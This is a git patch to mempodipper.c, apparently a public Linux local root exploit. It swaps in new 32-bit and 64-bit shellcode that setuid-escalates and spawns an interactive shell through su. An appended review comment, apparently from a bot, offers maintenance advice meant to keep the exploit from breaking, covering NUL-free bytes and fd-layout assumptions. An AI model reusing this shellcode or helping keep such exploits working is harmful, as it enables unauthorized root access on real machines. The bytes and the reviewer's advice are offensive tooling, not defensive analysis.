From 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sun, 22 Jan 2012 06:16:39 +0100
Subject: Add 32bit shellcode.
---
 mempodipper.c | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)
(limited to 'mempodipper.c')
diff --git a/mempodipper.c b/mempodipper.c
index 1fb8cc2..fb20c26 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -203,24 +203,28 @@ int main(int argc, char **argv)
 lseek64(fd, offset, SEEK_SET);
 #if defined(__i386__)
- // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php
+ // See shellcode-32.s in this package for the source.
 char shellcode[] =
- "\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1" "\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31" "\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
+
 #elif defined(__x86_64__)
+ // See shellcode-64.s in this package for the source.
 char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40" "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69" "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb" "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48" "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+
 #else
 #error "That platform is not supported."
 #endif
 printf("[+] Executing su with shellcode.\n");
 execl("/bin/su", "su", shellcode, NULL);
 } else {
- sleep(0.01);
 char pid[32];
 sprintf(pid, "%d", parent_pid);
 printf("[+] Executing child from child fork.\n");
-- cgit v1.2.3-59-g8ed1b
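Review bot: The new i386 blob's one hard constraint — no 0x00 byte anywhere, because it is handed to su as an argv string via `execl("/bin/su", "su", shellcode, NULL)` and is cut at the first NUL — is not recorded next to the array, so a later edit of the bytes can silently break the exploit. I would add above `char shellcode[] =` in the `__i386__` branch: `// Must stay free of 0x00 bytes: it is passed to su as an argv string and is truncated at the first NUL.` The bytes `\xb3\x06\xb1\x02\xb0\x3f\xcd\x80` are dup2(6, 2), mirroring the x86_64 blob, which bakes in an assumption about the target's fd layout whose origin is outside this hunk, so naming that assumption in the same comment would help the next person who retargets the code. The comment points to `shellcode-32.s`, but the diffstat shows only mempodipper.c changed, so presumably that file is added in another commit; worth confirming it actually ships in the package. main() starts and ends outside the hunk.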